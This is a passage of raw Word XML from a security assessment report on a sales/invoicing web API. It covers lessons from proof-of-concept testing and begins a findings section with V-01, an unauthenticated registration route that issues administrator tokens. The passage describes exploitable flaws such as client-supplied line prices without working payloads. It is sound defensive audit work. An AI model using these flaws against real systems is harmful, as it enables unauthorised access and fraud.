          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>did</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> compute the totals itself </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58-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">75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w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>did</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> force </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>inv_by</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the token </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 xml:space="preserve">:106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The real defect was narrower and, once understood, more interesting: the server computed correct totals </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from line prices the attacker supplied</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. That is the more instructive finding, because the code looks </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>defensive  and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> it is what makes the entire discount-approval workflow decorative.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143C1485"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An early PoC run reported V-04 and V-10 as already fixed.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Both had returned HTTP 500. A 500 is not </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a security</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> control; it was a malformed test payload. Had we accepted it, we would have reported two vulnerabilities as absent that were in fact exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEC0124"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A later run reported V-10 as fixed for the wrong reason.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The V-02 probe ("can an employee reprice stock?") set the catalogue price to 1 as a side effect, so V-10's "sell a 32,000 LKR </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tyre</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> for 1 LKR" check was comparing 1 against 1 and passing. We made the V-02 probe restore the price and V-10 read the live catalogue price instead of a hard-coded constant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF49F36" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="139" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="43"/>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general lesson, and one of the best-practice points in §8: </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a test that passes tells you nothing unless you have seen it fail for the right reason.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728CD25A" w14:textId="4F966761" w:rsidR="00345BB3" w:rsidRDefault="00345BB3">
      <w:pPr>
        <w:spacing w:after="559" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="29" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DBDA895" w14:textId="77777777" w:rsidR="00E868FD" w:rsidRDefault="00E868FD">
      <w:pPr>
        <w:spacing w:after="559" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="29" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="748D144D" w14:textId="77777777" w:rsidR="00E868FD" w:rsidRDefault="00E868FD">
      <w:pPr>
        <w:spacing w:after="559" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="29" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B5C049E" w14:textId="77777777" w:rsidR="00E868FD" w:rsidRDefault="00E868FD">
      <w:pPr>
        <w:spacing w:after="559" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="29" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56D7E484" w14:textId="77777777" w:rsidR="00E868FD" w:rsidRPr="005C54CB" w:rsidRDefault="00E868FD">
      <w:pPr>
        <w:spacing w:after="559" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="29" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F6EAABA" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00E868FD" w:rsidRDefault="008125F0" w:rsidP="005C54CB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E868FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4. Vulnerabilities found and fixed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739867ED" w14:textId="5808C742" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="00345BB3">
      <w:pPr>
        <w:spacing w:after="224" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="29" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38D7DE71" w14:textId="75E3EE79" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="326"/>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Ordered by severity. Each entry gives </w:t>
      </w:r>
      <w:r w:rsidR="005C54CB" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>evidence</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, exploit, root cause, fix and verification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7D6BE4" w14:textId="77777777"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V-01 · Unauthenticated registration issued administrator tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A0F7AD" w14:textId="41795FA9" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="38"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A01:2021 Broken Access Control</w:t>
      </w:r>
      <w:r w:rsidR="005C54CB"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CWE-862</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CWE-269</w:t>
      </w:r>
      <w:r w:rsidR="005C54CB"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CVSS 9.8</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"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AV:N</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AC:L</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PR:N</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UI:N</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>S:U</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/C:H/I:H/A:H) ·</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744A6643" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="43"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A85BBC4" w14:textId="77777777" w:rsidR="005C54CB" w:rsidRPr="005C54CB" w:rsidRDefault="005C54CB">
      <w:pPr>
        <w:spacing w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="43"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6541FDF1" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="200"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79C5FA34" wp14:editId="3B1CA197">
                <wp:extent cx="6480126" cy="1844422"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="25690" name="Group 25690"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6480126" cy="1844422"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6480126" cy="1844422"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="347" name="Shape 347"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="257175"/>
                            <a:ext cx="6480126" cy="714375"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="6480126" h="714375">
                                <a:moveTo>
                                  <a:pt x="19050" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="6467474" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6470001" y="0"/>
                                  <a:pt x="6472430" y="481"/>
                                  <a:pt x="6474764" y="1446"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="5029"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="709340"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6474764" y="712921"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6472430" y="713888"/>
                                  <a:pt x="6470001" y="714372"/>
                                  <a:pt x="6467474" y="714375"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="19050" y="714375"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="16524" y="714372"/>
                                  <a:pt x="14094" y="713888"/>
                                  <a:pt x="11760" y="712921"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="9426" y="711953"/>
                                  <a:pt x="7366" y="710577"/>
                                  <a:pt x="5580" y="708794"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3793" y="707008"/>
                                  <a:pt x="2417" y="704948"/>
                                  <a:pt x="1450" y="702613"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="695325"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="19050"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1450" y="11754"/>
                                </a:ln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408" name="Rectangle 408"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="18368"/>
                            <a:ext cx="736976" cy="148367"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="68850180" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="0B2D56"/>
                                </w:rPr>
                                <w:t>Evidence.</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="409" name="Rectangle 409"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="554236" y="18368"/>
                            <a:ext cx="43855" cy="148367"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3D9DCCA6"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410" name="Shape 410"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="590550" y="0"/>
                            <a:ext cx="1038225" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1038225" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1028700" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1031330" y="0"/>
                                  <a:pt x="1033575" y="930"/>
                                  <a:pt x="1035435" y="2787"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1037295" y="4648"/>
                                  <a:pt x="1038225" y="6894"/>
                                  <a:pt x="1038225" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1038225" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1038225" y="126454"/>
                                  <a:pt x="1037295" y="128699"/>
                                  <a:pt x="1035435" y="130556"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1033575" y="132417"/>
                                  <a:pt x="1031330" y="133347"/>
                                  <a:pt x="1028700" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133347"/>
                                  <a:pt x="4650" y="132417"/>
                                  <a:pt x="2790" y="130556"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6894"/>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11" name="Rectangle 411"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="614214" y="23659"/>
                            <a:ext cx="1317859" cy="140101"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="26AD5210" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>routes/api.php:28</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="412" name="Rectangle 412"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="412203"/>
                            <a:ext cx="1158984" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="319B4085" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>// Public Routes</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="413" name="Rectangle 413"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="583653"/>
                            <a:ext cx="4273754" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2041ACB6" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>Route::post(</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>'/login</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 xml:space="preserve"> [</w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>AuthController</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class, 'login']);</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="414" name="Rectangle 414"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="755103"/>
                            <a:ext cx="4491064" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0EA07210" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
